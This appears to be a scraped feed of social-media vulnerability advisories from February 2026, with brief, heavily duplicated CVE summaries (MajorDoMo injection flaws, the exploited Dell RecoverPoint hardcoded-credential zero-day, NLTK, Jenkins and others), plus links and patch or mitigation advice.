🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-27181/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T22:16:25.967000
2 posts
🟠 CVE-2026-27179 - High (8.2)
MajorDoMo (aka Major Domestic Module) contains an unauthenticated SQL injection vulnerability in the commands module. The commands_search.inc.php file directly interpolates the $_GET['parent'] parameter into multiple SQL queries without sanitizati...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-27179/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-27179 - High (8.2)
MajorDoMo (aka Major Domestic Module) contains an unauthenticated SQL injection vulnerability in the commands module. The commands_search.inc.php file directly interpolates the $_GET['parent'] parameter into multiple SQL queries without sanitizati...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-27179/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T22:16:25.263000
4 posts
MajorDoMo (all versions) faces a CRITICAL OS command injection (CVE-2026-27175, CVSS 9.2). Unauthenticated RCE via rc/index.php & cycle_execs.php. No patch yet — restrict endpoints, sanitize input, and monitor activity! https://radar.offseq.com/threat/cve-2026-27175-improper-neutralization-of-special--9a0f14bf #OffSeq #CVE202627175 #Infosec
##🔴 CVE-2026-27175 - Critical (9.8)
MajorDoMo (aka Major Domestic Module) is vulnerable to unauthenticated OS command injection via rc/index.php. The $param variable from user input is interpolated into a command string within double quotes without sanitization via escapeshellarg()....
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-27175/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##MajorDoMo (all versions) faces a CRITICAL OS command injection (CVE-2026-27175, CVSS 9.2). Unauthenticated RCE via rc/index.php & cycle_execs.php. No patch yet — restrict endpoints, sanitize input, and monitor activity! https://radar.offseq.com/threat/cve-2026-27175-improper-neutralization-of-special--9a0f14bf #OffSeq #CVE202627175 #Infosec
##🔴 CVE-2026-27175 - Critical (9.8)
MajorDoMo (aka Major Domestic Module) is vulnerable to unauthenticated OS command injection via rc/index.php. The $param variable from user input is interpolated into a command string within double quotes without sanitization via escapeshellarg()....
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-27175/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T22:16:25.080000
4 posts
🔴 CRITICAL: CVE-2026-27174 in MajorDoMo enables unauth RCE via vulnerable PHP handler — no user interaction needed. Full system compromise possible. Restrict panel access, patch, & monitor logs. Details: https://radar.offseq.com/threat/cve-2026-27174-improper-control-of-generation-of-c-e7d5bad6 #OffSeq #CVE202627174 #RCE #HomeAutomation #Infosec
##🔴 CVE-2026-27174 - Critical (9.8)
MajorDoMo (aka Major Domestic Module) allows unauthenticated remote code execution via the admin panel's PHP console feature. An include order bug in modules/panel.class.php causes execution to continue past a redirect() call that lacks an exit st...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-27174/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CRITICAL: CVE-2026-27174 in MajorDoMo enables unauth RCE via vulnerable PHP handler — no user interaction needed. Full system compromise possible. Restrict panel access, patch, & monitor logs. Details: https://radar.offseq.com/threat/cve-2026-27174-improper-control-of-generation-of-c-e7d5bad6 #OffSeq #CVE202627174 #RCE #HomeAutomation #Infosec
##🔴 CVE-2026-27174 - Critical (9.8)
MajorDoMo (aka Major Domestic Module) allows unauthenticated remote code execution via the admin panel's PHP console feature. An include order bug in modules/panel.class.php causes execution to continue past a redirect() call that lacks an exit st...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-27174/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T21:32:25
4 posts
🔴 CVE-2026-1435 - Critical (9.8)
Not properly invalidated session vulnerability in Graylog Web Interface, version 2.2.3, due to incorrect management of session invalidation after new logins. The application generates a new 'sessionId' each time a user authenticates, but does not ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1435/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##⚠️ CVE-2026-1435 (CRITICAL): Graylog Web Interface 2.2.3 fails to expire old sessions, enabling token reuse & unauthorized access. Restrict access, enable MFA, and monitor sessions until patch is released. Details: https://radar.offseq.com/threat/cve-2026-1435-cwe-613-insufficient-session-expirat-34761982 #OffSeq #Graylog #Vuln #Security
##🔴 CVE-2026-1435 - Critical (9.8)
Not properly invalidated session vulnerability in Graylog Web Interface, version 2.2.3, due to incorrect management of session invalidation after new logins. The application generates a new 'sessionId' each time a user authenticates, but does not ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1435/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##⚠️ CVE-2026-1435 (CRITICAL): Graylog Web Interface 2.2.3 fails to expire old sessions, enabling token reuse & unauthorized access. Restrict access, enable MFA, and monitor sessions until patch is released. Details: https://radar.offseq.com/threat/cve-2026-1435-cwe-613-insufficient-session-expirat-34761982 #OffSeq #Graylog #Vuln #Security
##updated 2026-02-18T21:31:34
2 posts
2 repos
🟠 CVE-2025-1272 - High (7.7)
The Linux Kernel lockdown mode for kernel versions starting on 6.12 and above for Fedora Linux has the lockdown mode disabled without any warning. This may allow an attacker to gain access to sensitive information such kernel memory mappings, I/O ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-1272/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-1272 - High (7.7)
The Linux Kernel lockdown mode for kernel versions starting on 6.12 and above for Fedora Linux has the lockdown mode disabled without any warning. This may allow an attacker to gain access to sensitive information such kernel memory mappings, I/O ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-1272/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T21:31:34
2 posts
🟠 CVE-2026-0875 - High (7.8)
A maliciously crafted MODEL file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code i...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0875/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-0875 - High (7.8)
A maliciously crafted MODEL file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code i...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0875/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T21:31:23
2 posts
🟠 CVE-2025-70064 - High (8.8)
PHPGurukul Hospital Management System v4.0 contains a Privilege Escalation vulnerability. A low-privileged user (Patient) can directly access the Administrator Dashboard and all sub-modules (e.g., User Logs, Doctor Management) by manually browsing...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70064/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-70064 - High (8.8)
PHPGurukul Hospital Management System v4.0 contains a Privilege Escalation vulnerability. A low-privileged user (Patient) can directly access the Administrator Dashboard and all sub-modules (e.g., User Logs, Doctor Management) by manually browsing...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70064/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T21:31:23
2 posts
🟠 CVE-2025-70147 - High (7.5)
Missing authentication in /admin/student.php and /admin/teacher.php in ProjectWorlds Online Time Table Generator 1.0 allows remote attackers to obtain sensitive information (including plaintext password field values) via direct HTTP GET requests t...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70147/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-70147 - High (7.5)
Missing authentication in /admin/student.php and /admin/teacher.php in ProjectWorlds Online Time Table Generator 1.0 allows remote attackers to obtain sensitive information (including plaintext password field values) via direct HTTP GET requests t...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70147/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T21:16:21.480000
6 posts
The security issues impact Code Runner (CVE-2025-65715), Markdown Preview Enhanced (CVE-2025-65716), Markdown Preview Enhanced (CVE-2025-65717), and Microsoft Live Preview (no identifier assigned). https://www.bleepingcomputer.com/news/security/flaws-in-popular-vscode-extensions-expose-developers-to-attacks/
##🔴 CVE-2025-65717 - Critical (9.1)
An issue in Visual Studio Code Extensions Live Server v5.7.9 allows attackers to exfiltrate files via user interaction with a crafted HTML page.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65717/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-65717 - Critical (9.1)
An issue in Visual Studio Code Extensions Live Server v5.7.9 allows attackers to exfiltrate files via user interaction with a crafted HTML page.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65717/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##The security issues impact Code Runner (CVE-2025-65715), Markdown Preview Enhanced (CVE-2025-65716), Markdown Preview Enhanced (CVE-2025-65717), and Microsoft Live Preview (no identifier assigned). https://www.bleepingcomputer.com/news/security/flaws-in-popular-vscode-extensions-expose-developers-to-attacks/
##🔴 CVE-2025-65717 - Critical (9.1)
An issue in Visual Studio Code Extensions Live Server v5.7.9 allows attackers to exfiltrate files via user interaction with a crafted HTML page.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65717/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-65717 - Critical (9.1)
An issue in Visual Studio Code Extensions Live Server v5.7.9 allows attackers to exfiltrate files via user interaction with a crafted HTML page.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65717/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T20:18:32.193000
2 posts
🟠 CVE-2026-0874 - High (7.8)
A maliciously crafted CATPART file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0874/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-0874 - High (7.8)
A maliciously crafted CATPART file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0874/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T20:18:31.207000
4 posts
🔴 CVE-2025-14009 - Critical (10)
A critical vulnerability exists in the NLTK downloader component of nltk/nltk, affecting all versions. The _unzip_iter function in nltk/downloader.py uses zipfile.extractall() without performing path validation or security checks. This allows atta...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-14009/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-14009 - Critical (10)
A critical vulnerability exists in the NLTK downloader component of nltk/nltk, affecting all versions. The _unzip_iter function in nltk/downloader.py uses zipfile.extractall() without performing path validation or security checks. This allows atta...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-14009/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-14009 - Critical (10)
A critical vulnerability exists in the NLTK downloader component of nltk/nltk, affecting all versions. The _unzip_iter function in nltk/downloader.py uses zipfile.extractall() without performing path validation or security checks. This allows atta...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-14009/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-14009 - Critical (10)
A critical vulnerability exists in the NLTK downloader component of nltk/nltk, affecting all versions. The _unzip_iter function in nltk/downloader.py uses zipfile.extractall() without performing path validation or security checks. This allows atta...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-14009/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T20:01:15.983000
26 posts
⚠️ Dell RecoverPoint for VMs Zero-Day CVE-2026-22769 Exploited Since Mid-2024
https://thehackernews.com/2026/02/dell-recoverpoint-for-vms-zero-day-cve.html
##Dell warns of a max-severity flaw (CVE-2026-22769) in RecoverPoint for VMs, already exploited for root access in the wild. 🔓💻 Security teams are urged to patch or apply mitigations immediately. Details: https://cyberinsider.com/dell-warns-of-max-severity-flaw-in-recoverpoint-exploited-by-hackers/ #cybersecurity #infosec #Dell #Newz
##Fed agencies ordered to patch Dell bug by Saturday after exploitation warning
Dell and Google released notices on Tuesday about CVE-2026-22769, warning that a sophisticated Chinese actor has been targeting the bug since at...
🔗️ [Therecord] https://link.is.it/stSZK0
##Critical Dell RecoverPoint Exploit Exposed Since 2024
A zero-day Dell RecoverPoint exploit, CVE-2026-22769, has been actively exploited since mid-2024. Patch immediately to avoid data breaches.
Read more: https://thefinancialstandard.com/dell-recoverpoint-exploit/
##Hackers Exploit Dell RecoverPoint Zero-Day to Deploy Stealthy Backdoor
A critical flaw in Dell RecoverPoint for Virtual Machines (CVE-2026-22769) is actively exploited by threat actor using hard-coded credentials to deploy backdoors.
**If you are using Dell RecoverPoint, this is important! Check your Dell RecoverPoint versions and plan a very quick update to 6.0.3.1 HF1 patch to remove the hard-coded admin credentials. Ensure these appliances are isolated from the internet.**
#cybersecurity #infosec #attack #activeexploit
https://beyondmachines.net/event_details/unc6201-exploits-dell-recoverpoint-zero-day-to-deploy-stealthy-grimbolt-backdoor-v-5-i-5-6/gD2P6Ple2L
CVE ID: CVE-2026-22769
Vendor: Dell
Product: RecoverPoint for Virtual Machines (RP4VMs)
Date Added: 2026-02-18
Notes: https://www.dell.com/support/kbdoc/en-us/000426773/dsa-2026-079 ; https://www.dell.com/support/kbdoc/en-us/000426742/recoverpoint-for-vms-apply-the-remediation-script-for-dsa ; https://cloud.google.com/blog/topics/threat-intelligence/unc6201-exploiting-dell-recoverpoint-zero-day ; https://nvd.nist.gov/vuln/detail/CVE-2026-22769
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-22769
🚨 Mandiant have identified zero-day exploitation of a high-risk vulnerability in Dell RecoverPoint for Virtual Machines, tracked as CVE-2026-22769.
RecoverPoint can be detected using this Nuclei template:
https://github.com/projectdiscovery/nuclei-templates/pull/15377/changes
Very limited exposure to the internet.
Dell recommends upgrading to version 6.0.3.1 HF1 or later. Mitigations are also available.
Mandiant report:
https://cloud.google.com/blog/topics/threat-intelligence/unc6201-exploiting-dell-recoverpoint-zero-day
China-Linked APT Exploits Critical Dell RecoverPoint Zero-Day for Over a Year + Video
Introduction In a stark warning to enterprise security teams, researchers from Mandiant and Google’s Threat Intelligence Group (GTIG) have revealed that a China-linked advanced persistent threat (APT) group quietly exploited a severe zero-day vulnerability in Dell RecoverPoint for Virtual Machines since mid-2024. The flaw, now tracked as CVE-2026-22769, carries the highest severity…
##The activity involves the exploitation of CVE-2026-22769 (CVSS score: 10.0), a case of hard-coded credentials affecting versions prior to 6.0.3.1 HF1. Other products, including RecoverPoint Classic, are not vulnerable to the flaw. https://thehackernews.com/2026/02/dell-recoverpoint-for-vms-zero-day-cve.html
##📢 Zero‑day critique sur Dell RecoverPoint for VMs (CVE-2026-22769) exploitée par UNC6201 avec le backdoor GRIMBOLT
📝 Sel...
📖 cyberveille : https://cyberveille.ch/posts/2026-02-18-zero-day-critique-sur-dell-recoverpoint-for-vms-cve-2026-22769-exploitee-par-unc6201-avec-le-backdoor-grimbolt/
🌐 source : https://cloud.google.com/blog/topics/threat-intelligence/unc6201-exploiting-dell-recoverpoint-zero-day?hl=en
#CVE_2026_22769 #Dell_RecoverPoint_for_Virtual_Machines #Cyberveille
Zero-Day in Dell RecoverPoint Exploited by Chinese Hacker Group
A critical zero-day vulnerability, tracked as CVE-2026-22769, is being actively exploited in Dell Technologies’ RecoverPoint for Virtual Machines....
🔗️ [Thecyberexpress] https://link.is.it/FOr0Id
##CRITICAL: CVE-2026-22769 in Dell RecoverPoint for VMs (≤5.3 SP4 P1) lets unauthenticated attackers gain root via hardcoded creds. Patch or mitigate ASAP! 🛡️ https://radar.offseq.com/threat/cve-2026-22769-cwe-798-use-of-hard-coded-credentia-cad7841a #OffSeq #Vulnerability #Dell #InfoSec
##🔴 CVE-2026-22769 - Critical (10)
Dell RecoverPoint for Virtual Machines, versions prior to 6.0.3.1 HF1, contain a hardcoded credential vulnerability. This is considered critical as an unauthenticated remote attacker with knowledge of the hardcoded credential could potentially exp...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-22769/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##New.
Mandiant:From BRICKSTORM to GRIMBOLT: UNC6201 Exploiting a Dell RecoverPoint for Virtual Machines Zero-Day https://cloud.google.com/blog/topics/threat-intelligence/unc6201-exploiting-dell-recoverpoint-zero-day
Dell posted an update on February 11:
Critical: CVE-2026-22769: Security Update for RecoverPoint for Virtual Machines Hardcoded Credential Vulnerability https://www.dell.com/support/kbdoc/en-us/000426773/dsa-2026-079 #infosec #Google #Dell #zeroday
##Dell warns of a max-severity flaw (CVE-2026-22769) in RecoverPoint for VMs, already exploited for root access in the wild. 🔓💻 Security teams are urged to patch or apply mitigations immediately. Details: https://cyberinsider.com/dell-warns-of-max-severity-flaw-in-recoverpoint-exploited-by-hackers/ #cybersecurity #infosec #Dell #Newz
##Fed agencies ordered to patch Dell bug by Saturday after exploitation warning
Dell and Google released notices on Tuesday about CVE-2026-22769, warning that a sophisticated Chinese actor has been targeting the bug since at...
🔗️ [Therecord] https://link.is.it/stSZK0
##Critical Dell RecoverPoint Exploit Exposed Since 2024
A zero-day Dell RecoverPoint exploit, CVE-2026-22769, has been actively exploited since mid-2024. Patch immediately to avoid data breaches.
Read more: https://thefinancialstandard.com/dell-recoverpoint-exploit/
##Hackers Exploit Dell RecoverPoint Zero-Day to Deploy Stealthy Backdoor
A critical flaw in Dell RecoverPoint for Virtual Machines (CVE-2026-22769) is actively exploited by threat actor using hard-coded credentials to deploy backdoors.
**If you are using Dell RecoverPoint, this is important! Check your Dell RecoverPoint versions and plan a very quick update to 6.0.3.1 HF1 patch to remove the hard-coded admin credentials. Ensure these appliances are isolated from the internet.**
#cybersecurity #infosec #attack #activeexploit
https://beyondmachines.net/event_details/unc6201-exploits-dell-recoverpoint-zero-day-to-deploy-stealthy-grimbolt-backdoor-v-5-i-5-6/gD2P6Ple2L
CVE ID: CVE-2026-22769
Vendor: Dell
Product: RecoverPoint for Virtual Machines (RP4VMs)
Date Added: 2026-02-18
Notes: https://www.dell.com/support/kbdoc/en-us/000426773/dsa-2026-079 ; https://www.dell.com/support/kbdoc/en-us/000426742/recoverpoint-for-vms-apply-the-remediation-script-for-dsa ; https://cloud.google.com/blog/topics/threat-intelligence/unc6201-exploiting-dell-recoverpoint-zero-day ; https://nvd.nist.gov/vuln/detail/CVE-2026-22769
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-22769
🚨 Mandiant have identified zero-day exploitation of a high-risk vulnerability in Dell RecoverPoint for Virtual Machines, tracked as CVE-2026-22769.
RecoverPoint can be detected using this Nuclei template:
https://github.com/projectdiscovery/nuclei-templates/pull/15377/changes
Very limited exposure to the internet.
Dell recommends upgrading to version 6.0.3.1 HF1 or later. Mitigations are also available.
Mandiant report:
https://cloud.google.com/blog/topics/threat-intelligence/unc6201-exploiting-dell-recoverpoint-zero-day
The activity involves the exploitation of CVE-2026-22769 (CVSS score: 10.0), a case of hard-coded credentials affecting versions prior to 6.0.3.1 HF1. Other products, including RecoverPoint Classic, are not vulnerable to the flaw. https://thehackernews.com/2026/02/dell-recoverpoint-for-vms-zero-day-cve.html
##📢 Zero‑day critique sur Dell RecoverPoint for VMs (CVE-2026-22769) exploitée par UNC6201 avec le backdoor GRIMBOLT
📝 Sel...
📖 cyberveille : https://cyberveille.ch/posts/2026-02-18-zero-day-critique-sur-dell-recoverpoint-for-vms-cve-2026-22769-exploitee-par-unc6201-avec-le-backdoor-grimbolt/
🌐 source : https://cloud.google.com/blog/topics/threat-intelligence/unc6201-exploiting-dell-recoverpoint-zero-day?hl=en
#CVE_2026_22769 #Dell_RecoverPoint_for_Virtual_Machines #Cyberveille
Zero-Day in Dell RecoverPoint Exploited by Chinese Hacker Group
A critical zero-day vulnerability, tracked as CVE-2026-22769, is being actively exploited in Dell Technologies’ RecoverPoint for Virtual Machines....
🔗️ [Thecyberexpress] https://link.is.it/FOr0Id
##CRITICAL: CVE-2026-22769 in Dell RecoverPoint for VMs (≤5.3 SP4 P1) lets unauthenticated attackers gain root via hardcoded creds. Patch or mitigate ASAP! 🛡️ https://radar.offseq.com/threat/cve-2026-22769-cwe-798-use-of-hard-coded-credentia-cad7841a #OffSeq #Vulnerability #Dell #InfoSec
##🔴 CVE-2026-22769 - Critical (10)
Dell RecoverPoint for Virtual Machines, versions prior to 6.0.3.1 HF1, contain a hardcoded credential vulnerability. This is considered critical as an unauthenticated remote attacker with knowledge of the hardcoded credential could potentially exp...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-22769/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##New.
Mandiant:From BRICKSTORM to GRIMBOLT: UNC6201 Exploiting a Dell RecoverPoint for Virtual Machines Zero-Day https://cloud.google.com/blog/topics/threat-intelligence/unc6201-exploiting-dell-recoverpoint-zero-day
Dell posted an update on February 11:
Critical: CVE-2026-22769: Security Update for RecoverPoint for Virtual Machines Hardcoded Credential Vulnerability https://www.dell.com/support/kbdoc/en-us/000426773/dsa-2026-079 #infosec #Google #Dell #zeroday
##updated 2026-02-18T19:21:43.090000
2 posts
🔴 CVE-2025-70149 - Critical (9.8)
CodeAstro Membership Management System 1.0 is vulnerable to SQL Injection in print_membership_card.php via the ID parameter.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70149/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-70149 - Critical (9.8)
CodeAstro Membership Management System 1.0 is vulnerable to SQL Injection in print_membership_card.php via the ID parameter.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70149/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T19:21:42.767000
2 posts
🔴 CVE-2025-70146 - Critical (9.1)
Missing authentication in multiple administrative action scripts under /admin/ in ProjectWorlds Online Time Table Generator 1.0 allows remote attackers to perform unauthorized administrative operations (e.g.,adding records, deleting records) via d...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70146/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-70146 - Critical (9.1)
Missing authentication in multiple administrative action scripts under /admin/ in ProjectWorlds Online Time Table Generator 1.0 allows remote attackers to perform unauthorized administrative operations (e.g.,adding records, deleting records) via d...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70146/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T18:31:26
4 posts
Gitlab vulnerability CVE-2021-22175 got added to the CISA KEV. But this vuln is just a more complete patch to CVE-2021-22214. Likewise CVE-2021-39935 covers even more case where the CI Lint function could be used without authentication. In fact, the exploit code identical for all vulnerabilites. CVE-2021-39935 was already on the list, CVE-2021-22175 got added today and CVE-2021-22214 is still missing.
##CVE ID: CVE-2021-22175
Vendor: GitLab
Product: GitLab
Date Added: 2026-02-18
Notes: https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22175.json ; https://nvd.nist.gov/vuln/detail/CVE-2021-22175
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2021-22175
Gitlab vulnerability CVE-2021-22175 got added to the CISA KEV. But this vuln is just a more complete patch to CVE-2021-22214. Likewise CVE-2021-39935 covers even more case where the CI Lint function could be used without authentication. In fact, the exploit code identical for all vulnerabilites. CVE-2021-39935 was already on the list, CVE-2021-22175 got added today and CVE-2021-22214 is still missing.
##CVE ID: CVE-2021-22175
Vendor: GitLab
Product: GitLab
Date Added: 2026-02-18
Notes: https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22175.json ; https://nvd.nist.gov/vuln/detail/CVE-2021-22175
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2021-22175
updated 2026-02-18T18:30:51
2 posts
🟠 CVE-2026-24708 - High (8.2)
An issue was discovered in OpenStack Nova before 30.2.2, 31 before 31.2.1, and 32 before 32.1.1. By writing a malicious QCOW header to a root or ephemeral disk and then triggering a resize, a user may convince Nova's Flat image backend to call qem...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24708/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-24708 - High (8.2)
An issue was discovered in OpenStack Nova before 30.2.2, 31 before 31.2.1, and 32 before 32.1.1. By writing a malicious QCOW header to a root or ephemeral disk and then triggering a resize, a user may convince Nova's Flat image backend to call qem...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24708/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T18:30:51
4 posts
🟠 CVE-2026-2507 - High (7.5)
When BIG-IP AFM or BIG-IP DDoS is provisioned, undisclosed traffic can cause TMM to terminate. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2507/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2507 - High (7.5)
When BIG-IP AFM or BIG-IP DDoS is provisioned, undisclosed traffic can cause TMM to terminate. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2507/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2507 - High (7.5)
When BIG-IP AFM or BIG-IP DDoS is provisioned, undisclosed traffic can cause TMM to terminate. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2507/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2507 - High (7.5)
When BIG-IP AFM or BIG-IP DDoS is provisioned, undisclosed traffic can cause TMM to terminate. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2507/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T18:30:47
2 posts
🟠 CVE-2025-70148 - High (7.5)
Missing authentication and authorization in print_membership_card.php in CodeAstro Membership Management System 1.0 allows unauthenticated attackers to access membership card data of arbitrary users via direct requests with a manipulated id parame...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70148/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-70148 - High (7.5)
Missing authentication and authorization in print_membership_card.php in CodeAstro Membership Management System 1.0 allows unauthenticated attackers to access membership card data of arbitrary users via direct requests with a manipulated id parame...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70148/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T18:30:39
2 posts
1 repos
🔴 CVE-2025-65791 - Critical (9.8)
ZoneMinder v1.36.34 is vulnerable to Command Injection in web/views/image.php. The application passes unsanitized user input directly to the exec() function.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65791/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-65791 - Critical (9.8)
ZoneMinder v1.36.34 is vulnerable to Command Injection in web/views/image.php. The application passes unsanitized user input directly to the exec() function.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65791/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T18:30:39
4 posts
🔴 CVE-2025-70998 - Critical (9.8)
UTT HiPER 810 / nv810v4 router firmware v1.5.0-140603 was discovered to contain insecure default credentials for the telnet service, possibly allowing a remote attacker to gain root access via a crafted script.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70998/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-70998 - Critical (9.8)
UTT HiPER 810 / nv810v4 router firmware v1.5.0-140603 was discovered to contain insecure default credentials for the telnet service, possibly allowing a remote attacker to gain root access via a crafted script.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70998/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-70998 - Critical (9.8)
UTT HiPER 810 / nv810v4 router firmware v1.5.0-140603 was discovered to contain insecure default credentials for the telnet service, possibly allowing a remote attacker to gain root access via a crafted script.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70998/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-70998 - Critical (9.8)
UTT HiPER 810 / nv810v4 router firmware v1.5.0-140603 was discovered to contain insecure default credentials for the telnet service, possibly allowing a remote attacker to gain root access via a crafted script.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70998/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T18:30:38
6 posts
⚠️ HIGH severity: Jenkins 2.483-2.550 & LTS 2.492.1-2.541.1 hit by CVE-2026-27099 (stored XSS). Requires Agent/Configure or Agent/Disconnect permissions. Patch, restrict privileges, and review logs! https://radar.offseq.com/threat/cve-2026-27099-vulnerability-in-jenkins-project-je-f2bd90c0 #OffSeq #Jenkins #XSS #Security
##🟠 CVE-2026-27099 - High (8)
